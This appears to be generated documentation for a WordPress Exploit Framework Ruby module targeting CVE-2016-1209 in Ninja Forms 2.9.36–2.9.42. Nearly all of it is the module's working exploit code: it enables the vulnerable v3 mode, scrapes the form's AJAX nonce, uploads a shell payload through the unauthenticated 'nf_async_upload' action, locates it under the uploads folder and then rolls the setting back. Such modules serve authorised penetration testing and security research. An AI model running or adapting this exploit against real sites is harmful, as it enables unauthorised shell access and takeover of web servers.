class Wpxf::Exploit::NinjaFormsUnauthenticatedShellUpload
Attributes
ninja_form_nonce[R]
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb, line 6 def initialize super update_info( name: 'Ninja Forms 2.9.36 to 2.9.42 Unauthenticated Shell Upload', author: [ 'James Golovich', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['CVE', '2016-1209'], ['WPVDB', '8485'], ['URL', 'http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities'] ], date: 'May 04 2016' ) register_options([ StringOption.new( name: 'form_path', desc: 'The relative path of the page that hosts any form served by Ninja Forms', required: true ) ]) end
Public Instance Methods
before_upload()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload#before_upload
# File lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb, line 59 def before_upload # Enable the v3 functionality. emit_info 'Enabling vulnerable V3 functionality...' execute_get_request(url: full_uri, params: { 'nf-switcher' => 'upgrade' }) # Fetch a nonce for the upload. emit_info 'Fetching Ninja Form nonce...' unless fetch_ninja_form_nonce emit_error 'Failed to acquire a valid nonce' emit_error "Ensure that #{normalize_uri(full_uri, datastore['form_path'])} contains a valid form" return false end emit_success "Nonce acquired: #{ninja_form_nonce}", true super end
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb, line 32 def check check_plugin_version_from_readme('ninja-forms', '2.9.43', '2.9.36') end
cleanup()
click to toggle source
Calls superclass method
Wpxf::Module#cleanup
# File lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb, line 76 def cleanup # Disable the v3 functionality. execute_get_request(url: full_uri, params: { 'nf-switcher' => 'rollback' }) super end
fetch_ninja_form_nonce()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb, line 52 def fetch_ninja_form_nonce res = execute_get_request(url: normalize_uri(full_uri, datastore['form_path'])) return false unless res && res.code == 200 @ninja_form_nonce = res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] @ninja_form_nonce end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb, line 40 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_field('action', 'nf_async_upload') builder.add_field('security', ninja_form_nonce) builder.add_file_from_string(Utility::Text.rand_alpha(5), payload.encoded, payload_name) builder end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb, line 48 def uploaded_payload_location normalize_uri(wordpress_url_uploads, "nftmp-#{payload_name.downcase}") end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb, line 36 def uploader_url wordpress_url_admin_ajax end